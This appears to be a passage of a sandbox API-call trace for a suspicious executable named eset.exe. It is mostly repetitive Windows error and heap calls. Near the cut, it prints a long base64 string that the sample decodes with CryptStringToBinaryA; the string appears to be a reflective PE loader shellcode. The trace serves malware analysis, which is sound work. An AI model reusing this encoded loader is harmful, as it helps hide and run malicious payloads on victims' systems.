!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZØ\x15ªÄø\x1e", lpUsedDefaultChar=0x0) returned 256 [0157.189] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xd22568, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eset.exe")) returned 0x2e [0157.189] GetLastError () returned 0x0 [0157.189] SetLastError (dwErrCode=0x0) [0157.189] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.190] SetLastError (dwErrCode=0x0) [0157.190] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.191] GetLastError () returned 0x0 [0157.191] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.251] SetLastError (dwErrCode=0x0) [0157.251] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x37) returned 0x460c98 [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.252] GetLastError () returned 0x0 [0157.252] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.253] SetLastError (dwErrCode=0x0) [0157.253] GetLastError () returned 0x0 [0157.254] SetLastError (dwErrCode=0x0) [0157.254] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.255] GetLastError () returned 0x0 [0157.255] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] GetLastError () returned 0x0 [0157.256] SetLastError (dwErrCode=0x0) [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x9c) returned 0x460cd8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1f) returned 0x45dc30 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x36) returned 0x460d80 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x37) returned 0x460dc0 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x460e00 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x31) returned 0x460e48 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17) returned 0x460e88 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x460ea8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x460ed8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xd) returned 0x460ef8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x25) returned 0x460f10 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x39) returned 0x460f40 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x460f88 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17) returned 0x460fa8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x460fc8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x69) returned 0x45f9d0 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3e) returned 0x45fa48 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1b) returned 0x45dc58 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1d) returned 0x45dc80 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x48) returned 0x45fa90 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x45fae0 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x45fb00 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1b) returned 0x45dca8 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x45fb20 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x29) returned 0x45fb50 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e) returned 0x45dcd0 [0157.256] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x41) returned 0x45fb88 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17) returned 0x45fbd8 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x45fbf8 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xf) returned 0x45fc18 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x16) returned 0x45fc30 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2a) returned 0x45fc50 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x29) returned 0x45fc88 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x15) returned 0x45fcc0 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e) returned 0x45dcf8 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2a) returned 0x45fce0 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x45fd18 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x45fd38 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x46) returned 0x45fd58 [0157.257] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4604e0 | out: hHeap=0x450000) returned 1 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x80) returned 0x45fda8 [0157.257] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x800) returned 0x45fe30 [0157.257] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0157.257] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd118c3) returned 0x0 [0157.258] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x45fda8) returned 0x80 [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.258] GetLastError () returned 0x0 [0157.258] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.259] SetLastError (dwErrCode=0x0) [0157.259] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.260] GetLastError () returned 0x0 [0157.260] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] GetLastError () returned 0x0 [0157.261] SetLastError (dwErrCode=0x0) [0157.261] FindResourceA (hModule=0x0, lpName=0x65, lpType=0xa) returned 0xd24280 [0157.263] LoadResource (hModule=0x0, hResInfo=0xd24280) returned 0xd242d0 [0157.263] SizeofResource (hModule=0x0, hResInfo=0xd24280) returned 0xa7de9 [0157.263] LockResource (hResData=0xd242d0) returned 0xd242d0 [0157.263] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x765d0000 [0157.270] GetProcAddress (hModule=0x765d0000, lpProcName="CryptStringToBinaryA") returned 0x76605d77 [0157.278] CryptStringToBinaryA (in: pszString="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